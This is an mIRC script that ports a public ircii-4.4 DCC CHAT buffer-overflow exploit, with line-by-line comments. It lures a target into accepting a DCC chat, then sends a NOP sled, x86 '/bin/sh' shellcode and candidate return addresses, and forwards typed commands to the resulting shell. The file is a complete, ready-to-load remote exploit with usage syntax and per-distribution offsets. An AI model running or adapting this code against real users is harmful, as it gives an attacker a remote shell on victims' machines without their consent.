; ide_expl.mrc: vade79 -> _v9[[email protected]], www.fakehalo.org.
;
; ircii-4-4 exploit->ported to mirc5.7, works reverse to ircii-4.4.c. You send the chat
; request instead of having them chat you, result is the same.
;
; Wrote directly from ircii-4.4.c(for *nix), that someone gave me to port to mirc.
;
; Exploit to overflow a buffer. Although, more often than not it will crash/seg fault
; with both versions of this exploit, by default offsets. (exploit noted as being for
; V4.4, and patched in V4.4M)
;
; ircii-4.4.c by: bladi & aLmUDeNa.
; ide_expl.mrc(this) by: _v9(vade79).
;
; Also included in the exploit(ircii4.4.c) were some other offsets:
;
; "SuSe 6.x :0xbfffe3ff"
; "RedHat :0xbfffe888"
;
; To load this script into mIRC5.7: /load -rs <path/to/file.mrc>
;
; NOTE: While making this I noticed /sockwrite had some problems catching up on checking to see if
; the connection still exists, so if you see a /sockwrite error in the status window, the user
; probably seg faulted.
alias -l bin {
; Decode one two-character hex byte (e.g. 90, ff) into its decimal value.
; $1 - the two hex characters; any other length returns $null.
; Only lowercase a-f are handled: the 87 offset is $asc(a) - 10, so uppercase letters would go negative.
if ($len($1) != 2) { return }
var %i, %j, %k
; %i = high nibble, %j = low nibble; decimal digits are used as-is, letters go through $asc.
; NOTE(review): the two $calc() lines below end with an extra ")" - this looks unbalanced, verify it parses as intended in mIRC 5.7.
if ($left($1,1) !isnum) { %i = $calc($asc($left($1,1)) -87)) }
else { %i = $left($1,1) }
if ($right($1,1) !isnum) { %j = $calc($asc($right($1,1)) -87)) }
else { %j = $right($1,1) }
; High nibble times 16 by repeated addition, then add the low nibble.
while (%i) { %k = %k + 16 | dec %i }
return $calc(%k + %j)
}
alias -l make_string {
; Turn a \xNN\xNN... escape string into the space-separated list of byte values $bin yields,
; in the form /bset expects. $1 - the escaped hex string.
; Strip the "x" so every byte becomes one backslash-delimited token (chr 92).
var %hex = $replace($1,\x,\)
var %total = $gettok(%hex,0,92)
var %n = 1, %out
while (%n <= %total) {
%out = %out $bin($gettok(%hex,%n,92))
inc %n
}
return %out
}
alias -l wn {
; Name of the custom window that receives the script's status output.
return @ircii4.4_dcc_exploit
}
alias -l sw {
; Guarded /sockwrite: $1- is handed to /sockwrite verbatim (switches, socket name, data),
; but only while the exp_ide socket is still active. Otherwise the status window is closed
; and the last stage reached (%ide.status) is reported. Does nothing without a second word.
if (!$2) { return }
if ($sock(exp_ide).status == active) {
; Mirror what was last written in the window title, then send it.
if ($window($wn)) { titlebar $wn $chr(91) data sent to socket(last): $1- $chr(93) }
sockwrite $1-
return
}
if ($window($wn)) { window -c $wn }
echo -a Connection lost/non-existant. ( $+ %ide.status $+ )
}
alias -l main {
; Stage [01]: open a fresh status window, pick a listening port and offer the target a DCC CHAT.
; $1 - target nick. Globals written: %ide.nick, %ide.port.
if ($window($wn)) { window -c $wn } | window -aek $wn
echo $wn *** [01]: sending DCC chat request, waiting...
; Random port in 1024-4096, re-rolled until $portfree reports it unused.
set %ide.nick $1 | set %ide.port $rand(1024,4096)
while ($portfree(%ide.port) != $true) { set %ide.port $rand(1024,4096) }
; Listen on exp_ide_base; the on SOCKLISTEN handler accepts the incoming connection.
sockclose exp_ide_base | socklisten exp_ide_base %ide.port
; Raw CTCP DCC CHAT offer ($chr(1) delimits the CTCP) pointing at our own $ip and the chosen port.
.quote privmsg $1 : $+ $chr(1) $+ DCC CHAT chat $longip($ip) %ide.port $+ $chr(1)
}
alias exploit_ircii {
; User entry point: /exploit_ircii <nick>. Only acts while connected ($server set);
; refuses to start while a previous run's window is still open, and requires mIRC 5.7+
; (the same check /on LOAD performs). Everything else is delegated to $main.
if ($server) {
if ($window($wn)) { echo -a *** Close the exploit window before attempting to exploit. | halt }
elseif ($version < 5.7) { echo -a *** Functions in this script require mIRC5.7 or greater. (aborted) | halt }
elseif ($1) { main $1 }
else { echo -a Syntax: /exploit_ircii <nick> }
}
; Not connected: silently does nothing.
}
on 1:SOCKREAD:exp_ide: {
; Drain every pending line from the target's DCC socket into the status window.
; Reads into the global %data (left set), shows "(no data)" for empty lines.
if ($sockerr > 0) { return }
while ($true) {
sockread %data
; $sockbr is 0 once nothing more is buffered.
if ($sockbr == 0) { return }
if (%data == $null) { var %data = (no data) }
if ($window($wn)) { echo $wn -> %data }
}
}
on 1:SOCKLISTEN:exp_ide_base: {
; Target accepted the DCC CHAT offer: take the connection, drop the listener, then push the
; payload in four stages. %ide.status counts completed stages (0..4); the on INPUT handler
; only forwards typed text once it reaches 4. If the status window is gone the run was
; cancelled, so the accepted connection is closed again instead (else branch at the bottom).
sockclose exp_ide | sockaccept exp_ide | sockclose exp_ide_base
unset %ide.status
if ($window($wn)) {
set %ide.status 0
echo $wn *** [02]: connected, setting up binary variables. (nops/shell code/etc)
; &nops: 16 x 0x90 (x86 NOP), the sled sent ahead of the shellcode.
bset &nops 1 $make_string(\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90)
; &o: the 4-byte offset value, written one byte at a time in stage 3; the header comment
; lists the alternative per-distribution offsets carried over from ircii-4.4.c.
bset &o 1 $make_string(\xff\xbf\xff\xe3)
; ^- try different offsets here.
; &shellcode: 38 bytes, presumably copied verbatim from ircii-4.4.c, followed by the text
; "/bin/sh" appended right after the last byte ($bvar(&x,0) is the variable's length).
bset &shellcode 1 $make_string(\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff)
bset -t &shellcode $calc($bvar(&shellcode,0) +1) /bin/sh
echo $wn *** [03]: attempting to overflow buffer, sending the variables. (nops/shell code/etc)
inc %ide.status
echo $wn *** [--]: * (1/4) sending the nops, looping 47 times.
; Stage 1: the 16-byte NOP block, 47 times.
var %i = 0
while (%i < 47) {
sw exp_ide &nops
inc %i
}
inc %ide.status
echo $wn *** [--]: * (2/4) sent, now sending the shell code.
; Stage 2: the shellcode, then a counting loop that only serves as a crude delay.
sw exp_ide &shellcode
%i = 0 | while (%i < 9999) { inc %i }
inc %ide.status
echo $wn *** [--]: * (3/4) sent, now waiting/continuing, looping 299 times.
; Stage 3: the four &o bytes, one byte per sockwrite, repeated 299 times with a short
; busy-wait before each repetition.
%i = 0
while (%i < 299) {
var %j = 0 | while (%j < 499) { inc %j }
var %j = 1
while ($bvar(&o,%j)) {
bset &bit 1 $bvar(&o,%j)
sw exp_ide &bit
inc %j
}
inc %i
}
inc %ide.status
echo $wn *** [--]: * (4/4) sent, done.
}
else { sockclose exp_ide }
}
on 1:SOCKCLOSE:exp_ide: {
; The remote end closed the DCC socket (per the header note, a crash on the target end
; shows up here too). Report which stage (%ide.status) had been reached and clear every
; %ide.* global. The window is closed first, so the echo lands in whichever window
; becomes active afterwards - keep this order.
if ($window($wn)) { window -c $wn }
echo -a *** Connection lost with %ide.nick $+ . ( $+ %ide.status $+ )
unset %ide.*
}
on 1:CLOSE:@: {
; Closing the status window by hand aborts the run: both sockets are torn down and the
; %ide.* globals cleared. Other custom windows are ignored.
if ($target != $wn) { return }
if ($sock(exp_ide)) { sockclose exp_ide }
if ($sock(exp_ide_base)) { sockclose exp_ide_base }
unset %ide.*
}
on 1:INPUT:@: {
; Text typed into the status window is forwarded to the target socket with a newline,
; but only once all four stages are done (%ide.status == 4) and the socket is active.
; Input is always swallowed (halt) so it never reaches the server; other windows are ignored.
if ($active != $wn) { return }
if ($sock(exp_ide).status != active) { echo $wn *** Error, socket status isn't online yet. }
elseif (%ide.status != 4) { echo *** Error, status is not at 4 yet, wait for completion. }
else { echo $wn <- $1- | sw -n exp_ide $1- }
halt
}
on 1:LOAD: {
; On /load: announce the syntax on a supported client, otherwise report the version
; requirement and unload the script again.
if ($version >= 5.7) { echo -a *** Loaded $nopath($script) $+ , syntax is: /exploit_ircii <nick>. }
else { echo -a *** Functions in this script( $+ $nopath($script) $+ ) require mIRC5.7 or greater. (aborted) | .unload -rs $script | halt }
}